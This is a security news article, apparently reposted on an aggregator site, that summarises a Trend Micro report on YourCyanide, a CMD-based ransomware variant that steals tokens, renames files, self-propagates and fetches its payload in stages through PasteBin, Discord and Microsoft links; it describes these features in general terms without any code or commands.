YourCyanide Ransomware Propagates With PasteBin, Discord, Microsoft Links

  /     /     /  
Publicated : 23/11/2024   Category : security


YourCyanide Ransomware Propagates With PasteBin, Discord, Microsoft Links


The latest iteration of CMD-based ransomware is sophisticated and tricky to detect – and integrates token theft and worming capabilities into its feature set.



A new CMD-based ransomware variant is still under development, but researchers warn that its poisonous combination of multiple layers of obfuscation and the sneaky integration of legitimate service links into its attack make it a potentially formidable threat. 
YourCyanide traces its roots back to the GonnaCope
ransomware
family first discovered in April, a new report from the Trend Micro threat hunting team explains. It doesnt actually encrypt anything yet (researchers say thats likely coming soon), but it does rename all targeted files, steal information, and pilfer access tokens from popular applications like Chrome, Discord, and Microsoft Edge. It also self-propagates.
YourCyanide includes a few new tactics, including using PasteBin, Discord, and Microsoft links to download its payload in stages, and hiding behind Enable Delayed Expansion functionality, the analysts note. 
While YourCyanide and its other variants are currently not as impactful as other families, it represents an interesting update to ransomware kits by bundling a worm, a ransomware, and an information stealer into a single mid-tier ransomware framework, the the
 ransomware variant report
 says. It is also likely that these ransomware variants are in their development stages, making it a priority to detect and block them before they can evolve further and do even more damage. 

Last News

▸ DHS-funded SWAMP scans code for bugs. ◂
Discovered: 23/12/2024
Category: security

▸ Debunking Machine Learning in Security. ◂
Discovered: 23/12/2024
Category: security

▸ Researchers create BlackForest to gather, link threat data. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
YourCyanide Ransomware Propagates With PasteBin, Discord, Microsoft Links